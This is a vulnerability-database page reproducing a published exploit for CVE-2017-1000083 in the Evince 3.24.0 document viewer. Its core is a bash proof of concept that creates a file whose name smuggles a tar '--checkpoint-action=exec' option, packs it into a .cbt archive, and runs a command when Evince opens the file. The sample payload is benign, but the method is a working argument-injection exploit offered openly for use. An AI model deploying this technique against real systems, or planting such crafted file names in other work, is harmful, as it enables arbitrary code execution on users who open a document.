Lucene search
K

Evince 3.24.0 - Command Injection Exploit

🗓️ 13 Nov 2018 00:00:00Reported by MatlinkType 
zdt
 zdt
🔗 0day.today👁 153 Views

Evince 3.24.0 command injection exploi

Related
Code
# Exploit Title: evince command line injection
# Exploit Author: Matlink
# Vendor Homepage: https://wiki.gnome.org/Apps/Evince
# Software Link: https://wiki.gnome.org/Apps/Evince
# Version: 3.24.0
# Tested on: Debian sid
# CVE : CVE-2017-1000083
 
Can be tested on docker with https://github.com/matlink/evince-cve-2017-1000083
 
#! /bin/bash
 
# define the payload
export PAYLOAD="firefox google.com"
 
# Create the malicious .cbt file
dd if=/dev/zero of=" --checkpoint-action=exec=bash -c '$PAYLOAD;'.jpg" bs=1 count=512000
tar cvf poc.cbt *.jpg
 
# Run the malicious file
evince poc.cbt

#  0day.today [2018-11-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Nov 2018 00:00Current
7.8High risk
Vulners AI Score7.8
EPSS0.76136
153